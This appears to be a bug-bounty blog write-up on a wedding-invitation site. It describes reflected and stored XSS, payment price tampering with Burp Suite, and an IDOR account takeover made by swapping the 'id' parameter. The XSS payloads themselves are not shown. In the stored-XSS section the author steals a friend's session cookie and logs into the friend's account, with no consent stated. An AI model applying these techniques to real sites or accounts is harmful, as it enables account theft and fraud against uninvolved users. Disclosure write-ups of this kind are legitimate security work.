Hello everyone, how are you all doing? I hope each and every one of you is doing well. In this article, it might be a bit longer than the previous ones.
It all started when I was invited to attend my friend's wedding event through a website link. My friend used a website that provides online invitation creation for an event. I will be sharing several sections regarding the explanation of the bugs that I discovered:
- XSS Reflected
- Change Price From Parameter Tampering
- Account Take Over
- XSS Stored
I hope you can easily find what you're looking for within this article, and for the website I mentioned above, we will refer to it as "site.com".
Wedding invitation website interface
XSS Reflected
When I opened the invitation link sent by my friend, I received a URL www.site.com/my-friend-and-girl that contained the details of their wedding invitation.
Parameter discovery using Arjun tool
Then I started to wonder, could this invitation be customized for specific individuals, like the name "naruto," for example? Does this invitation allow for the inclusion of personally created names like that? I immediately opened my terminal and used the tool "arjun" to check if there were any other parameters present in that URL.
arjun -u https://site.com/my-friend-and-girl
Parameter discovery using Arjun tool
After waiting for a while, I obtained the parameters "tap, rayId, to, rxk"
I chose to use the "to" parameter, so the full URL became www.site.com/my-friend-and-girl?to=naruto. And to my surprise, the name "naruto" that I inputted appeared in the invitation.
Parameter discovery using Arjun tool
Then I used this payload:
And I successfully executed the pop-up alert.
Successful XSS reflected attack execution
Change Price From Parameter Tampering
After obtaining the XSS Reflected, I thought, why not take a little time to explore what the website has to offer. I arrived at the pricing page, which contained premium packages for users who wanted to access additional features. I attempted to purchase a premium account without the added features.
Premium pricing page with multiple packages
I turned on Burp Suite and proceeded with the payment, and I got the request data like this.
Parameter discovery using burp
I obtained the parameter "Price:124000" and immediately I changed it to "Price:10". Then, I forwarded the request data.
Parameter change using burp
Unfortunately, I didn't get what I was expecting, which was a change in the price.
Parameter discovery using Arjun tool
I tried going back to the previous page, and this time I attempted to add another feature to my purchase.
Burp Suite intercepting payment request
I made sure that "intercept" was on in Burp Suite and proceeded with the payment. I obtained the following request data:
Parameter discovery using Arjun tool
Because previously I had attempted to change the initial price but didn't succeed, this time I modified all the "Price" parameters under the "Items" section to "10".
Parameter discovery using Arjun tool
I found that the price had changed to well below the actual price I was supposed to pay, which was "1,003,976". It became "129,570".
Parameter discovery using Arjun tool
Critical Finding: Successfully manipulated the payment price through parameter tampering, reducing the total from 1,003,976 to 129,570 - a reduction of over 87%
Account Take Over
Hmm, interesting, I think. I returned to do a deeper recon on the user dashboard section. I created a user on the website and tried to look at the 'Edit Profile' section.
User dashboard and profile edit section
I filled in the required data before pressing 'Update Profile.' I made sure my Burp Suite was running.
Parameter discovery using Arjun tool
When looking at the request, there are several interesting parameters, namely 'id, is_admin, is_trial, is_reseller, is_premium, saldo, premium'. I tried changing all the parameters except the 'id' parameter, but unfortunately, none of them worked.
I attempted to change 'id: 165309 <my first account>' to 'id: 165310 <my second account>', and it worked. The data on my second account changed to match the first account.
// Original request
id: 165309
name: "My Account"
email: "myemail@test.com"
// Modified request (Account Takeover)
id: 165310
name: "Victim Account"
email: "victim@test.com"
To take over an account, you can request a password reset link sent to the registered WhatsApp number.
Parameter discovery using Arjun tool
But when I returned to the dashboard, I realized there was a password form, so I filled it in immediately and received a data request as follows:
Parameter discovery using Arjun tool
I changed the 'id' parameter as I did above, and at this stage. I could access someone else's account without needing to request a password reset. It was as simple as creating a new password and changing the 'id' parameter.
Critical Vulnerability: Complete account takeover possible by simply manipulating the 'id' parameter in profile update requests. This allows changing passwords of any user account.
XSS Stored
XSS Stored here I used to perform cookie stealing, leading to an account takeover. I found this bug when creating a free invitation on the website with same template like my friend. The invitation link is located at www.site.com/test-bug
Creating a custom wedding invitation template
In the music section, you can customize it by adding SoundCloud, and I tried inputting a simple payload.
Creating a custom wedding invitation template
And it was immediately rendered on the page. I began to wonder if this would be stored. I inserted an XSS payload.
I tried accessing my digital invitation and the XSS payload appeared perfectly.
Stored XSS successfully executing in the invitation
I used Burp Collaborator as a server to capture the cookie that would be taken. I used a simple payload like this.
After that, I inserted it into the music form, and asked my friend to access the invitation. Hehe.
In the Burp Collaborator, I received a response like the one below.
Burp Collaborator capturing stolen cookies
I immediately changed all the cookies in the browser to match the cookie I obtained.
Creating a custom wedding invitation template
I refreshed my browser, and I successfully gained access to my friend's account.
Creating a custom wedding invitation template
Successful Cookie Theft: Through stored XSS, I was able to steal session cookies and gain unauthorized access to victim accounts without their knowledge.
Responsible Disclosure and Resolution
I reported it, and unexpectedly, I received a reward for my report. I have requested permission to write this article, and they have granted it.
Note: I've obtained permission, but they mentioned using the inspect element and modifying the data as needed because they didn't want any accidental publication of sensitive user data and their data. However, the way I found the bug is as I reported, but they asked me to use the latest screenshot after they patched their system.
Impact Summary
The vulnerabilities discovered had significant security implications:
- XSS Reflected: Allowed for client-side attacks and potential session hijacking
- Price Manipulation: Financial impact with ability to purchase premium features at drastically reduced prices
- Account Takeover: Complete compromise of user accounts through parameter manipulation
- XSS Stored: Persistent attacks affecting all users who view the malicious invitation
Conclusion
This case demonstrates how a simple wedding invitation website can harbor multiple critical vulnerabilities. The combination of inadequate input validation, improper access controls, and insufficient parameter verification created a perfect storm for security exploitation.
Maybe that's all from me, hopefully it can be a reference for you. I'm RyuuKhagetsu, see you in next article.
